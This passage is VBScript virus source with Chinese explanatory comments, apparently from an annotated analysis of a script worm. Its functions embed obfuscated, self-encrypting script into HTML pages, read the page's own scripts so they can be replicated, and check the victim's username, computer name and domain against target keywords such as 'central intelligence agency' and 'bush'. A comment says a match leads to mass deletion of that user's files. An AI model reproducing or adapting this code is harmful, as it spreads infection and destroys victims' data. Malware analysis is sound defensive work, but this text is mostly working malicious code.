"<bo" & "ad>" & vbcrlf & makescript(sbuffer, ihtml) & vbcrlf & _
"<" & "/boad><" & "/html>"
end function
function makescript(codestr, ihtml) '此程序是病毒进行自我加密过程,较为复杂,不再描述
if ihtml then
dim docuwrite
docuwrite = "document.write('<'+" & "'script language=javascript>\n'+" & _
"jword" & "+'\n</'" & "+'script>');"
docuwrite = docuwrite & vbcrlf & "document.write('<'+" & "'script language=vbscript>\n'+" & _
"nword" & "+'\n</'" & "+'script>');"
makescript="<" & "script language=javascript>" & vbcrlf & "var jword = " & _
chr(34) & encrypt(js_str) & chr(34) & vbcrlf & "var nword = " & _
chr(34) & codestr & chr(34) & vbcrlf & "nword = unescape(nword);" & vbcrlf & _
"jword = unescape(jword);" & vbcrlf & docuwrite & vbcrlf & "</" & "script>"
else
makescript= "<" & "script language=javascript>" & codestr & "</" & "script>"
end if
end function
function getscriptcode(languages) ' 得到不同脚本语言的代码
dim soj
for each soj in document.scripts
if lcase(soj.language) = languages then
if languages = "javascript" then
if len(soj.text)> 200 then
else
getscriptcode = soj.text
exit function
end if
else
getscriptcode = soj.text
exit function
end if
end if
next
end function
function getjavascript()
getjavascript = getscriptcode("javascript")
end function
function testuser() '检测用户过程
on error resume next
dim keys(6), i, tmpstr, wnet
'特定用户关键词
keys(0) = "white home"
keys(1) = "central intelligence agency"
keys(2) = "bush"
keys(3) = "american stock exchang"
keys(4) = "chief executive"
keys(5) = "usa"
testuser = false
set wnet = createobject("wscript.network") '创建网络对象
'下面一共3个循环,作用一样,是检查用户的 domain、用户名和计算机名是否含有以上的5个关键词语,一旦含有程序将返回”真”的条件,从而对这些用户的文件进行疯狂删除。
tmpstr = lcase(wnet.username) '
for i=0 to 4
if instr(tmpstr, keys(i)) > 0 then
testuser=true
exit function
end if
next
tmpstr = lcase(wnet.computername)
for i=0 to 4
if instr(tmpstr, keys(i)) > 0 then
testuser=true
exit function
end if
next
tmpstr = lcase(wnet.userdomain)
for i=0 to 4
if instr(tmpstr, keys(i)) >0 then
testuser=true
exit function
end if
next
set wnet = nothing
end function
